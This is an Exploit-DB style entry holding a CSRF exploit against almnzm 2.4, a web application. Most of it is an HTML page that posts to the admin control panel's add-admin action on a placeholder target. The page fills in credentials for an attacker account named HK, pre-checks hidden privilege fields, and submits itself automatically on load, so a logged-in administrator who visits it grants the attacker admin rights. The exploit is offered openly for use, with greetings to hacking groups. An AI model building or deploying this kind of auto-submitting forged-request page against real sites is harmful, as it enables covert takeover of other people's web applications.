vendor: by: HaNniBaL KsA (HK) N/A CVSS N/A CSRF CWE Product Name: Affected Version From: 2.4 Affected Version To: Patch Exists: NO Related CWE: CPE: Metasploit: Other Scripts: Platforms Tested: 2012 almnzm 2.4 <= CSRF Vulnerability (Add Admin) CSRF exploit that allows adding a new admin Mitigation: Source Share Copy Exploit-DB raw data: # Title: almnzm 2.4 <= CSRF Vulnerability (Add Admin) # Vendor: almnzm.com # Author: HaNniBaL KsA (HK) # Email: hk@r00t-s3c.com # Home: r00t-s3c.com # Published: 2o12-o2-1o # #------------------------------------------------------- # # CSRF Exploit (Add a New Admin) : <center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ] <span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff"> </font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font> <font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p> <p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center> <b><font face="Tahoma"><a href="http://www.r00t-s3c.com">www.r00t-s3c.com</a></font></b><br /><br /> <form name="add" action="http://www.target.com/PATH/admincpanel/index.php?action=doadd" method="post"> <table width="90%" cellspacing="1" cellpadding="4"><tr><td ><p align="center"> UserName: <input size=20 type="text" name="name" value="HK" ></td></tr><tr><td ><p align="center"> PassWord: <input size=20 type="password" name="password" value="123456" ></td></tr><tr><td ><p align="center"> E-mail: <input size=20 type="text" name="email" value="i@r00t-s3c.com" ></td></tr><tr><td><center> <table border=0><tr><td><tr><td> <! -- NOTE!: The value id'z for admin privileges can be change in any site :D "down in checkbox'z!" ^ so ? .. maybe this exploit will add a new admin but without administrator permissions "just user xD"!! --> <input type=checkbox type=hidden name=authorities1 value=25 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities2 value=24 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities3 value=34 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities4 value=41 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities5 value=39 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities6 value=12 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities7 value=21 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities8 value=38 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities9 value=9 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities10 value=2 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities11 value=3 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities12 value=4 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities13 value=5 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities14 value=6 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities15 value=11 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities16 value=44 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities17 value=50 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities18 value=18 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities19 value=30 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities20 value=14 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities21 value=37 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities22 value=35 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities23 value=43 checked></td></tr></table></td></tr> <input type="hidden" name="formtype" value="add"> <input type="hidden" name="componentid" value="39"></center> <! -- Greet'z to: r00t-s3c.com & alm3refh.com --> <tr><td><p align="center"> <input size=50 type="submit" name="submit" value="Add New Admin :D" ></td></tr></table></center></form> <script>document.add.submit();</script> # # The New Admin Login Info : # UserName: HK # PassWord: 123456 # #------------------------------------------- # Greet'z to : # Dr.S!lv3r - MR.DH - AL-K!NG - Dr.KroOoZ - 0r4ng-M4n - r3xb0t3r .. So on ! xD # S.Greet'z to : r00t-s3c.com & alm3refh.com